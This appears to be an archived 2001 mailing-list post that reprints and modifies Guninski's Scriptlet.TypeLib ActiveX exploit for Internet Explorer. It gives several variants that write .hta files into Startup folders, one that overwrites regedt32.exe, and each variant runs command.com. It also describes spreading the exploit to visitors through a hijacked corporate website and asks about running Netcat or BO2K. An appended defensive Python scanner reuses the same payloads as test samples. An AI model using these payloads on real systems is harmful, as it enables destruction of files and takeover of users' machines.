Okay, I haven't seen any interesting observations yet as to the value of this exploit or the potential damage it contains. This exploit allows for the OVERWRITING of any application you choose, WITHOUT the system objecting. I haven't tested it against anything specific yet, except for a trial run against Regedit. The key is to select a specific path in which a known file resides, such as C:\winnt\system32, and then give the .hta file the name of the file you want overwritten.

Here's the code originally included:

    <object id="scr" classid="clsid:06290BD5-48AA-11D2-8432-006008C3FBFC"></object>
    <SCRIPT>
    scr.Reset();
    scr.Path="C:\\windows\\Start Menu\\Programs\\StartUp\\guninski.hta";
    scr.Doc="<object id='wsh' classid='clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B'></object><SCRIPT>alert( 'Written by Georgi Guninski http://www.nat.bg/~joro');wsh.Run('c:\\command.com');</"+"SCRIPT>";
    scr.write();
    </SCRIPT>

If you wanted this to run against an NT machine, then:

    <object id="scr" classid="clsid:06290BD5-48AA-11D2-8432-006008C3FBFC"></object>
    <script>
    scr.Reset();
    scr.Path="C:\\WINNT\\Profiles\\All Users\\Start Menu\\Programs\\Startup\\guninski.hta";
    scr.Doc="<object id='wsh' classid='clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B'></object><SCRIPT>alert( 'Screw Denise Richards, Debbie Johnson r0x!');wsh.Run('c:\\command.com');</"+"SCRIPT>";
    scr.write();
    </script>

For all those arguing about figuring out which user it should be addressed to, the answer is "All Users".

Now watch as I modify this to destroy Regedt32:

    <object id="scr" classid="clsid:06290BD5-48AA-11D2-8432-006008C3FBFC"></object>
    <script>
    scr.Reset();
    scr.Path="C:\\WINNT\\System32\\regedt32.exe";
    scr.Doc="<object id='wsh' classid='clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B'></object><SCRIPT>alert( 'Screw Denise Richards, Debbie Johnson r0x!');wsh.Run('c:\\command.com');</"+"SCRIPT>";
    scr.write();
    </script>

As you can see, the simple malicious damage is unprecedented; good luck trying to figure out what's happened when your computers have crashed, permanently.

Now let me give you a simple scenario for a real-world example. Let's say a cracker, we'll call him Ahab, decides to take over ABC's or Symantec's web page, not that difficult to imagine. Without ever breaking the firewall, all he has to do is modify the web page. Now usually they detect the obscene message within minutes, taking it offline; imagine though if Ahab just modified the source. He could include in it both ActiveX exploits, for NT and 98; in addition he could add to the source an instruction to change to another web page in 5 seconds, a page he's added to InetPub. This new page would include the even more recent exploit that crashes IE5 with a form field overflow. Imagine how long it would take for anyone to realize that the web page had been hacked; their computers would freeze every time they went there for no apparent reason (the new exploit doesn't display the page that froze your browser, only the page before). All of those home users, the thousands of hits a day they'd be getting, would simply connect to the site, get their system kernel overwritten and have their browser crashed, forcing a restart for the home user. Does everyone see the potential damage here?

Has anyone figured out if an arbitrary binary could be executed? Such as Netcat or BO2K? Also, I understand Outlook executes this code immediately; is it possible that this same code could cause someone's system to crash merely by opening the e-mail?

Seth Georgion
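Added example (not part of Seth's message or of Guninski's original code): a small Python scanner that picks the Scriptlet.TypeLib write pattern out of an HTML page or mail body, so the variants discussed above can be spotted in web content or inbound mail before a browser renders them. It keys on the two CLSIDs that appear in the posted code (Scriptlet.TypeLib and WScript.Shell), the `.Path=` target, the `.write()` call and the `.Run(...)` command, and classifies the target path the way the post does: a Startup folder means the dropped .hta runs at next logon, a system directory means an existing binary is clobbered. The sample documents are adapted from the code in the post; the risk labels and the `Startup`/`system32` heuristics are this example's own assumptions.

```python
import re

# CLSIDs taken from the posted exploit code: Scriptlet.TypeLib does the
# file write via Path/Doc/write(); WScript.Shell's Run() launches the
# command once the dropped .hta executes. Compared lower-case.
SCRIPTLET_TYPELIB_CLSID = "06290bd5-48aa-11d2-8432-006008c3fbfc"
WSCRIPT_SHELL_CLSID = "f935dc22-1cf0-11d0-adb9-00c04fd58a0b"

# Target classes the post discusses (heuristics assumed by this example):
# a Startup folder runs the file at next logon, a system directory
# overwrites an existing binary such as regedt32.exe.
STARTUP_DIR = re.compile(r"\\start menu\\programs\\startup\\", re.I)
SYSTEM_DIR = re.compile(r"^[a-z]:\\(winnt|windows)\\system32\\", re.I)

_PATH_RE = re.compile(r"""\.Path\s*=\s*(["'])(.*?)\1""", re.S)
_RUN_RE = re.compile(r"""\.Run\s*\(\s*(["'])(.*?)\1""", re.S)
_WRITE_RE = re.compile(r"\.write\s*\(\s*\)")


def unescape_js(s):
    """Collapse the doubled backslashes of a JS string literal to real ones."""
    return s.replace("\\\\", "\\")


def classify(f):
    """Map the extracted findings to a risk label (labels are this example's)."""
    if not f["typelib"]:
        return "none"
    if not (f["write_called"] and f["path"]):
        return "suspicious"  # control instantiated but no recognisable write
    if STARTUP_DIR.search(f["path"]):
        return "persistence"  # .hta dropped where it runs at next logon
    if SYSTEM_DIR.search(f["path"]):
        return "overwrite"  # clobbers a system binary
    return "file-write"


def scan_for_typelib_write(html):
    """Return findings for Scriptlet.TypeLib file-write usage in html."""
    lower = html.lower()
    f = {
        "typelib": SCRIPTLET_TYPELIB_CLSID in lower,
        "wscript_shell": WSCRIPT_SHELL_CLSID in lower,
        "write_called": _WRITE_RE.search(html) is not None,
        "path": None,
        "run_cmd": None,
    }
    m = _PATH_RE.search(html)
    if m:
        f["path"] = unescape_js(m.group(2))
    m = _RUN_RE.search(html)
    if m:
        f["run_cmd"] = unescape_js(m.group(2))
    f["risk"] = classify(f)
    return f


# Constructed samples, adapted from the code in the post above.
SAMPLE_STARTUP_NT = r'''<object id="scr" classid="clsid:06290BD5-48AA-11D2-8432-006008C3FBFC"></object>
<script>
scr.Reset();
scr.Path="C:\\WINNT\\Profiles\\All Users\\Start Menu\\Programs\\Startup\\guninski.hta";
scr.Doc="<object id='wsh' classid='clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B'></object><SCRIPT>wsh.Run('c:\\command.com');</"+"SCRIPT>";
scr.write();
</script>
'''

SAMPLE_OVERWRITE = r'''<object id="scr" classid="clsid:06290BD5-48AA-11D2-8432-006008C3FBFC"></object>
<script>
scr.Reset();
scr.Path="C:\\WINNT\\System32\\regedt32.exe";
scr.Doc="<object id='wsh' classid='clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B'></object><SCRIPT>wsh.Run('c:\\command.com');</"+"SCRIPT>";
scr.write();
</script>
'''

SAMPLE_BENIGN = "<html><body><p>Nothing to see here.</p></body></html>"

if __name__ == "__main__":
    for name, doc in (("startup", SAMPLE_STARTUP_NT),
                      ("overwrite", SAMPLE_OVERWRITE),
                      ("benign", SAMPLE_BENIGN)):
        r = scan_for_typelib_write(doc)
        print(f"{name:10} risk={r['risk']:12} path={r['path']} run={r['run_cmd']}")
```

One detail worth noting when writing such a matcher: the posted code closes the inner script as `</"+"SCRIPT>` so that the literal `</SCRIPT>` never appears inside the outer script block and the HTML parser does not terminate it early. A detector that looks for a complete inner `<SCRIPT>...</SCRIPT>` pair will miss this; the scanner above deliberately matches the CLSIDs and the `.Run(` call instead.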
This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 14:59:43 PDT